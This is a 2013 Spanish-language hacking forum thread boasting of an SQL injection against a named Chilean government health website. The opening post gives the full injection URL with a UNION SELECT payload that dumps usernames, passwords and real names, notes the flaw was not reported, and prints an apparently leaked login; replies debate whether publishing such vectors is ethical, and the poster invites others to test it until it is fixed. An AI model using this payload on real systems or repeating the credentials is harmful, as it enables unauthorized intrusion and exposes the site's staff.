comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQLI http://webhosting.redsalud.gov.cl/

  • 8 Respuestas
  • 2586 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Junio 27, 2013, 07:05:25 pm »


SQL:

Verctor:http://webhosting.redsalud.gov.cl/transparencia/public/detalle_personal.php?annio=2012&id=-620 union select group_concat(concat_ws(char(58),username,password,realname) SEPARATOR 0x7e) from users-- -c

Reportado: No

gerardo.flores:gf43
« Última modificación: Enero 10, 2015, 01:13:57 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado s3cur1tyr00t

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Junio 27, 2013, 07:32:25 pm »
Te tomaste enserio lo que dijo matabarras? :P

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #2 en: Junio 27, 2013, 07:47:16 pm »
No el es asi siempre.. jaja solo que no publica nada de lo que hace xD
Muy bueno! Saludos,, Cronos.-

Desconectado s3cur1tyr00t

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Junio 27, 2013, 07:51:35 pm »
You are not allowed to view links. Register or Login
No el es asi siempre.. jaja solo que no publica nada de lo que hace xD
Muy bueno! Saludos,, Cronos.-

La verdad, y sin intenciones de atacar a nadie; yo tampoco lo haría-publicaría.

Convengamos que publicar inyecciones sql sin ninguna complejidad no es la gran cosa. Si al menos estuvieras bypasseando algún mecanismo de protección sería mas aceptable.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #4 en: Junio 27, 2013, 08:03:45 pm »
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #5 en: Junio 27, 2013, 08:23:28 pm »
Total mente de acuerdo bro! La única manera de aprender es con casos reales!

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« Respuesta #6 en: Junio 27, 2013, 08:37:06 pm »
A mí este post me gusta porque es un SQLi, y eso ni mucho menos es un fallo de seguridad leve, y porque además no se trata de una panadería ni ferretería, sino una web gubernamental.
Lo de que se debe dar vida a la sección estoy completamente de acuerdo.
En cuanto al encontronazo con Matabarras, no discutan, él es un buen tío (lo digo de primerísima mano) y no publica ni la mitad de lo que encuentra, y le respeto tanto como a todos los demás miembros del staff y usuarios del foro.

En fin, en cuanto pueda daré yo también vida a la sección con unos pocos fallos guardados que tengo.
Saludos.
Contacto: @migueljimeno96 -

Conectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Junio 28, 2013, 11:23:58 pm »
You are not allowed to view links. Register or Login
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #8 en: Junio 29, 2013, 03:23:11 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

yo creo q las lammereadas van en la etica de cada persona, como vieron encontre varios sqli en web del gobierno y no he hecho absolutamente ningun daño, el vector es obligatorio en las normas de hacking showoff, de hay en mas quien lo utilice para hacer daño, queda en el si lo meten preso... ahora yo propongo algo, por ej si yo muestro un vector union select, porq alguien mas no intenta un double query? o si yo llego solo hasta mostrar la version porq tiene waf porq no tomar el vector y ver si pueden saltar el waf... e ir compartiendo los vectores q vamos encontrando con el fin de aprender otras perspectivas y pensamientos de como afrontar el problema

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 759
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1151
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1848
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1045
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Direccion de Bienestar Fuerza Aerea Argentina

Iniciado por hdbreaker

Respuestas: 4
Vistas: 1909
Último mensaje Noviembre 26, 2012, 12:05:50 pm
por alexander1712